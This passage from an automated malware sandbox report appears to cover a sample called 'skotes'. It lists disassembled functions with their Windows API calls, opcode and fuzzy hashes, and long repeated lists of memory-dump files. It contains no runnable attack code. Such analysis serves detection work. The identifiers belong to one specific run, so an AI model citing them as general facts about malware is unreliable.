Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 7f045a6a3827579b790b99d180a1da74e10c3f9af2980938cce6863b0d8b068d
Instruction ID: 6ab070a7aba6f0a9d03d5a1402e55bab6b6ba7f4b2d0820e2bfcf5641b09f87c
Opcode Fuzzy Hash: 7f045a6a3827579b790b99d180a1da74e10c3f9af2980938cce6863b0d8b068d
Instruction Fuzzy Hash: BA111C7292410DABDB10DE95C984EDF77BCAF48350F205262E616E2080EB70EB19CB71

Function 002BAC53 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 002BAC8D

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 591160e6f7e2b4c7ab69f77930b4722934a523e93a5aa4e818c4a427cd81f780
Instruction ID: 36dbe4a9d15756a94a46c4363913ab6f8b2ecdbf1df50770065c3a33b5325233
Opcode Fuzzy Hash: 591160e6f7e2b4c7ab69f77930b4722934a523e93a5aa4e818c4a427cd81f780
Instruction Fuzzy Hash: 3B111571A0420AAFCB05DF58E9419DE7BF4EF48304F14406AF809AB251D630EE21CB65

Function 002BD82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,002BA813,00000001,00000364,00000006,000000FF,?,0029D3FC,3C8350B4,?,00297A8B,?), ref: 002BD871

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1bca86ab1fa74fe454a1878bcbfdebf83fefb970badb285a5a9afcf12b84f7b9
Instruction ID: 18379c99dde898e62a12b785db3210b57046757dec9b716883f1f21d595c4456
Opcode Fuzzy Hash: 1bca86ab1fa74fe454a1878bcbfdebf83fefb970badb285a5a9afcf12b84f7b9
Instruction Fuzzy Hash: EAF0E93557112666DB212E729C05BDB3759DF853F2B188021ED089B181FA20EC3286E0

Function 002BB04B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,3C8350B4,?,?,0029D3FC,3C8350B4,?,00297A8B,?,?,?,?,?,?,00287465,?), ref: 002BB07E

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b55138c74fd9e70fd79dc021a590a429e444c93bf3dc8b32dbb7dfb543b785a6
Instruction ID: 156817c1880e92ebd64d3adabe9aa2b7454dda9e04923b4aa78ffd169fbf8ff6
Opcode Fuzzy Hash: b55138c74fd9e70fd79dc021a590a429e444c93bf3dc8b32dbb7dfb543b785a6
Instruction Fuzzy Hash: 75E0653517122756DA333A769D45BFBB648DB423E0F151A10EE6596190DBD0DC2086E0

Function 002C1775 Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,002C1B65,?,?,00000000,?,002C1B65,00000000,0000000C), ref: 002C1792

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c4f23101455ba86dc8963f294de4a3af39cd30febb6805189e23b596b727bd9b
Instruction ID: 9311ba49a32e96ae76621c5178697a078bc00863943f99c935cba57ce44c0390
Opcode Fuzzy Hash: c4f23101455ba86dc8963f294de4a3af39cd30febb6805189e23b596b727bd9b
Instruction Fuzzy Hash: 3CD0923204014DBBDF129E84DC02EDA3BAAFB88714F014140FE1C66020C736E831AB95

Function 00296C70 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00296CF5

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: eec271d8e0ad327d640530fe45648a430a925eeff16974159e0e9d2a37e66d71
Instruction ID: 6210e033a8724dcc2c1ecb4c8b1d7a487c43745c86228a25af8d144d30c85407
Opcode Fuzzy Hash: eec271d8e0ad327d640530fe45648a430a925eeff16974159e0e9d2a37e66d71
Instruction Fuzzy Hash: 3CF0F971A60654E7CB00BB69DC0BB0E7B78EB07760F80034DE811672D1DB301A244BD2

Function 04B40BDD Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3357457007.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b40000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c968a3c005a2761cf60c84269b79dfe5716056de0bc36cafcc0c1b40a0d8d9c
Instruction ID: 2deef15a50ec77ac72d7b62b50e24834105863ee8cf6d93445982faa523ab1a4
Opcode Fuzzy Hash: 8c968a3c005a2761cf60c84269b79dfe5716056de0bc36cafcc0c1b40a0d8d9c
Instruction Fuzzy Hash: 7E21D4E738D111FD6242A5992F15AFA3BAEE6D773173085A6FA07C1603F3945A4A3031

Function 04B40BC6 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3357457007.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b40000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d5d5c573f3446ef9e524c3617ca75d13943e02e43ac199a49a32725f57e5d2c
Instruction ID: 2ac975fdee87d2d421fd5b784d299ab5da11c2a8ab59e94427d8005d8d6f4acc
Opcode Fuzzy Hash: 9d5d5c573f3446ef9e524c3617ca75d13943e02e43ac199a49a32725f57e5d2c
Instruction Fuzzy Hash: 802124EB38D210FE6242A5D52B05AFA3B6EE5C773133085A6FA07C1603F2D41A4E7131

Function 04B40BBF Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3357457007.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b40000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05065cab7c7c7709eadb770440aa4272f4f2557d2798af1d1d169dd532d8092f
Instruction ID: 6a58b7d207e91d163708aae707eeae7c5484146d6a2bd84687cd134944573db8
Opcode Fuzzy Hash: 05065cab7c7c7709eadb770440aa4272f4f2557d2798af1d1d169dd532d8092f
Instruction Fuzzy Hash: EA1106EB38D115FE6142A1C52B04AFA3B6EE1C733033185A6FA07D2503F2D41A4E3071

Function 04B40C03 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3357457007.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b40000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d03c43de678c5677e7c9210521089ce070f958d1f45181563374248adc54d54e
Instruction ID: 7edd91498ac33016ebee50511f940da9cc319e1f9cba47b8292cfedc8e1d1769
Opcode Fuzzy Hash: d03c43de678c5677e7c9210521089ce070f958d1f45181563374248adc54d54e
Instruction Fuzzy Hash: 83115EEB24E111BD7142A1D66B05AFA6B6EE5D773133086A6FA07D1903F2D51A4E3031

Function 04B40C21 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3357457007.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b40000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 839c42ebd08de40278fdc28278c7fb008ed925a7bba5484a9a3a3494f83cbd32
Instruction ID: 2423b2c6e47a0e948b53730d40dbb4286a0296c2ea83c525ff59ad7609990a08
Opcode Fuzzy Hash: 839c42ebd08de40278fdc28278c7fb008ed925a7bba5484a9a3a3494f83cbd32
Instruction Fuzzy Hash: 5C11A5EB24E211BDB242A1926B05EFA6B6DE6C773173085ABF947D1603F2941A4D3031

Function 04B40CA2 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3357457007.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b40000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4914b39cbb2695eb7a65ab2f3678033cd94243e2ca5deb4458fcc4e2ed0ce6a7
Instruction ID: 804b710eccbf07fe625f73f6ac02bf654c4ab2079a19bc8f558d170cb3299933
Opcode Fuzzy Hash: 4914b39cbb2695eb7a65ab2f3678033cd94243e2ca5deb4458fcc4e2ed0ce6a7
Instruction Fuzzy Hash: 210180EB28E111FD7142A1922B19AFA6B6CE5C7A3133085A7FA07D4503F2846A4E3031

Function 04B40C74 Relevance: .1, Instructions: 70COMMON

